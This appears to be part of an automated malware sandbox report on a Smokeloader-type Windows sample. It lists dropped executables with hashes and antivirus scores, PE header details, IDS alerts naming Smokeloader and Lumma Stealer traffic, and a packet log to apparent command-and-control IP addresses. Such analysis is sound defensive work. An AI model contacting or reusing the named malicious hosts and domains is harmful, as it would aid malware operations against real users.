                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199689717899[1].htm

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                          Category:dropped
                                                          Size (bytes):35682
                                                          Entropy (8bit):5.380720750839877
                                                          Encrypted:false
                                                          SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2St:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxZ
                                                          MD5:C99F81FAE1C0223AAF80EC6FD2BC8060
                                                          SHA1:C2B39C1F2F65F61149FEA19312C7CC1BC9AD524B
                                                          SHA-256:499891242148F0890FC3E1BE28FB0C68676230BB331FB00681C86ABA9033BA6D
                                                          SHA-512:317C357EF1862755FD7BA32FAA02F2D3E1288C3DF56455D77A4360336A113044D36B8CB819F2D5F0C3BF9D983775FB020BFD12167755E0F95D81F08BBBE01F10
                                                          Malicious:false
                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

                                                          C:\Users\user\AppData\Local\Temp\21AE.exe

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):325120
                                                          Entropy (8bit):7.384635086921583
                                                          Encrypted:false
                                                          SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                          MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                          SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                          SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                          SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[7..:Y.:Y.:Y.h..:Y.h...:Y.h..:Y.B..:Y.:X..:Y.1...:Y.h..:Y.1...:Y.Rich.:Y.........................PE..L......c.....................t.......=....... ....@.................................p..........................................d...................................H................................x..@............ ..d............................text...3........................... ..`.rdata...l... ...n..................@..@.data....F...........~..............@....rsrc................L..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\C9A7.exe

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):2144768
                                                          Entropy (8bit):6.853125036254329
                                                          Encrypted:false
                                                          SSDEEP:49152:OePpQElJtTF+TxMoxc1TU+j+dAzGwlrh:OePpQEltIuoITsdZ
                                                          MD5:5DEB4442AE617600891949163BB52F0A
                                                          SHA1:8935E2C43020D691D195890D415F56C4F22C6355
                                                          SHA-256:ABED71D9D57551E20D1A3A1D5646940411C9D06B52E4DBFA66478DB903544BEC
                                                          SHA-512:A4933BC6802EE123BDFD64344BA3782D1DB49370222B03722A5C389ECFB3D264C30A64442E3227DE128B761BD168FF5E85D6813B561B37ACC2146AEF0D103EE4
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...P......`u............@.......................... !..................@..............................<".......0................... ......................................................................................CODE.....e.......f.................. ..`DATA....L........0...j..............@...BSS......................................idata..<".......$..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc....0.......0..................@..P............. !....... .............@..P........................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\katA304.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\C9A7.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):881664
                                                          Entropy (8bit):6.555251818096116
                                                          Encrypted:false
                                                          SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                          MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                          SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                          SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                          SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\aarhevh

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41369
                                                          Entropy (8bit):6.643664707313246
                                                          Encrypted:false
                                                          SSDEEP:768:yBQB1CTmqUQHXQkkU3NIZjKQu/MGQ2lsDBw7en:yBc0+yQmNIZreMp28O7Y
                                                          MD5:A93525F5F13C811E90C56492F5AC934A
                                                          SHA1:37FB7A8B8903F4B614CEC214F0FF0C69C88A1864
                                                          SHA-256:1B69A9C37210A79131C5CBCFAA4163FB5027989B4537B43A5A6CF6F40A4BAB1A
                                                          SHA-512:3D6267F5BA8FE3AEF759559D7358D6418EDAA927E9C6C5832CA4BB0703498DB6DC69F196715C14DFC727F3487A297C6201A5243BD1A762E3D5A1EB800EF13B3D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....5Kf...............H............C3............@..................................o...............................................................................................................................................................text............................... ...................................................................................................g.7f....B.o..dCv..w..F'..........+...&/..[#.+*/.4[..C..v.C...Y.>+......wv.R&...O...'.h.%..?.bM..k-Kp8+..)...J....<....H......GuKm;B.R.`....=..D!elN\.`NcH.M...."...'..uj..F...J....F.l.r..{%...9o.....?....5.D.5...C..q!...m..W...x.|k..J.=.K...." .id..w.Z..\'..=..%..-..T38@.K..t$.^...~..e...70.I....6e.[.^.......V...G.j....&..i..S...V....l..a.....`P.%8..RW......\..".....@k$.6r-G....o.j..|k.]`V.0....z.t.Z.Q.D[*....5".u....+U... ..C.%2c.V3.O.7..8b.e..#...^d]N

                                                          C:\Users\user\AppData\Roaming\aarhevh:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.643664707313246
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          File name:c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                                                          File size:41'369 bytes
                                                          MD5:a93525f5f13c811e90c56492f5ac934a
                                                          SHA1:37fb7a8b8903f4b614cec214f0ff0c69c88a1864
                                                          SHA256:1b69a9c37210a79131c5cbcfaa4163fb5027989b4537b43a5a6cf6f40a4bab1a
                                                          SHA512:3d6267f5ba8fe3aef759559d7358d6418edaa927e9c6c5832ca4bb0703498db6dc69f196715c14dfc727f3487a297c6201a5243bd1a762e3d5a1eb800ef13b3d
                                                          SSDEEP:768:yBQB1CTmqUQHXQkkU3NIZjKQu/MGQ2lsDBw7en:yBc0+yQmNIZreMp28O7Y
                                                          TLSH:F103D05A2292D462C7BC05F1CDC255BF6270F9C12A1A53B4C274EC7B3669FE353A482B
                                                          File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....5Kf...............H............C3............@..................................o.....................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x403343
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:
                                                          Time Stamp:0x664B35E9 [Mon May 20 11:37:13 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:1
                                                          OS Version Minor:0
                                                          File Version Major:1
                                                          File Version Minor:0
                                                          Subsystem Version Major:1
                                                          Subsystem Version Minor:0
                                                          Import Hash:

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F3CB539C8E5h
                                                          jne 00007F3CB539C8E7h
                                                          je 00007F3CB539C8E5h

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x92930x9400b90e33e08d86d940c0e1c5c796d65f12False0.7663904138513513data7.0432856719930195IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          05/27/24-00:27:15.022691TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971280192.168.2.5187.143.58.5
                                                          05/27/24-00:27:18.565315TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971580192.168.2.5187.143.58.5
                                                          05/27/24-00:27:54.236884TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974480192.168.2.5187.143.58.5
                                                          05/27/24-00:29:19.604016TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977580192.168.2.5186.112.12.192
                                                          05/27/24-00:27:22.060746TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971880192.168.2.5187.143.58.5
                                                          05/27/24-00:29:39.895797TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977880192.168.2.5186.112.12.192
                                                          05/27/24-00:27:25.797524TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972180192.168.2.5187.143.58.5
                                                          05/27/24-00:29:58.334389TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978180192.168.2.5186.112.12.192
                                                          05/27/24-00:30:16.965107TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978480192.168.2.5186.112.12.192
                                                          05/27/24-00:30:34.843315TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978780192.168.2.5186.112.12.192
                                                          05/27/24-00:29:52.939237TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978080192.168.2.5186.112.12.192
                                                          05/27/24-00:27:26.891612TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972380192.168.2.5187.143.58.5
                                                          05/27/24-00:29:47.866787TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977980192.168.2.5186.112.12.192
                                                          05/27/24-00:27:24.492005TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971980192.168.2.5187.143.58.5
                                                          05/27/24-00:27:14.005469TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971180192.168.2.5187.143.58.5
                                                          05/27/24-00:27:17.401783TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971480192.168.2.5187.143.58.5
                                                          05/27/24-00:29:06.967758TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977380192.168.2.5186.112.12.192
                                                          05/27/24-00:27:49.450238TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973780192.168.2.5187.143.58.5
                                                          05/27/24-00:29:27.743670TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977680192.168.2.5186.112.12.192
                                                          05/27/24-00:30:05.849413TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978280192.168.2.5186.112.12.192
                                                          05/27/24-00:27:24.792143UDP2052787ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop)5802153192.168.2.51.1.1.1
                                                          05/27/24-00:30:42.022426TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978880192.168.2.5186.112.12.192
                                                          05/27/24-00:30:23.451714TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978580192.168.2.5186.112.12.192
                                                          05/27/24-00:27:19.578145TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971680192.168.2.5187.143.58.5
                                                          05/27/24-00:29:14.086645TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977480192.168.2.5186.112.12.192
                                                          05/27/24-00:27:16.337150TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971380192.168.2.5187.143.58.5
                                                          05/27/24-00:27:50.525998TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973980192.168.2.5187.143.58.5
                                                          05/27/24-00:30:11.305895TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978380192.168.2.5186.112.12.192
                                                          05/27/24-00:30:28.702005TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978680192.168.2.5186.112.12.192
                                                          05/27/24-00:30:47.787369TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978980192.168.2.5186.112.12.192
                                                          05/27/24-00:29:33.855725TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977780192.168.2.5186.112.12.192
                                                          05/27/24-00:30:56.387180TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4979080192.168.2.5186.112.12.192

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 27, 2024 00:27:14.000351906 CEST4971180192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:14.005270958 CEST8049711187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:14.005467892 CEST4971180192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:14.005469084 CEST4971180192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:14.005548954 CEST4971180192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:14.062309980 CEST8049711187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:14.114593983 CEST8049711187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:14.993361950 CEST8049711187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:14.993382931 CEST8049711187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:14.993449926 CEST4971180192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:14.994725943 CEST4971180192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:15.006295919 CEST4971280192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:15.012368917 CEST8049711187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:15.018811941 CEST8049712187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:15.022572994 CEST4971280192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:15.022691011 CEST4971280192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:15.022710085 CEST4971280192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:15.037214041 CEST8049712187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:15.037254095 CEST8049712187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:16.009608984 CEST8049712187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:16.019737005 CEST8049712187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:16.019891977 CEST4971280192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:16.029027939 CEST4971280192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:16.038275003 CEST8049712187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:16.124876976 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:16.336829901 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:16.336949110 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:16.337150097 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:16.337188005 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:16.342924118 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:16.342952967 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.349195957 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.349241018 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.349309921 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.350302935 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.355607033 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.368911028 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.368961096 CEST4971380192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.401458025 CEST8049713187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.401499033 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.401593924 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.401782990 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.401809931 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:17.417618036 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:17.417650938 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.533272982 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.536871910 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.536937952 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.536974907 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.539388895 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.539453030 CEST4971480192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.541100979 CEST4971580192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.565016031 CEST8049714187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.565049887 CEST8049715187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.565126896 CEST4971580192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.565315008 CEST4971580192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.565335035 CEST4971580192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:18.615335941 CEST8049715187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:18.615345955 CEST8049715187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.546773911 CEST8049715187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.546787977 CEST8049715187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.546890974 CEST4971580192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.547127962 CEST4971580192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.550410986 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.577860117 CEST8049715187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.577872038 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.577972889 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.578145027 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.578180075 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.592189074 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.592199087 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.562275887 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.562289000 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.562378883 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:20.562551975 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:20.565143108 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:20.572406054 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.576210976 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:20.576304913 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:20.576462984 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:20.591604948 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.278526068 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.279771090 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.279830933 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.286313057 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.286324978 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.286482096 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.289170027 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.291573048 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.291584969 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.291635990 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.294320107 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.294348955 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.294414043 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.300221920 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.300234079 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.300239086 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.300313950 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.389282942 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.390288115 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.390345097 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.392853975 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.395136118 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.395293951 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.397520065 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.397531986 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.397583961 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.402440071 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.404356003 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.404367924 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.404377937 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.404423952 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.408319950 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.408333063 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.408492088 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.412240982 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.412252903 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.412312031 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.416004896 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.416070938 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.416112900 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.419742107 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.419928074 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.419964075 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.422806978 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.422817945 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.422827959 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.422863007 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.482070923 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.482927084 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.482975960 CEST4971780192.168.2.545.129.96.86
                                                          May 27, 2024 00:27:21.484778881 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.487684011 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.487693071 CEST804971745.129.96.86192.168.2.5
                                                          May 27, 2024 00:27:21.487720013 CEST4971780192.168.2.545.129.96.86
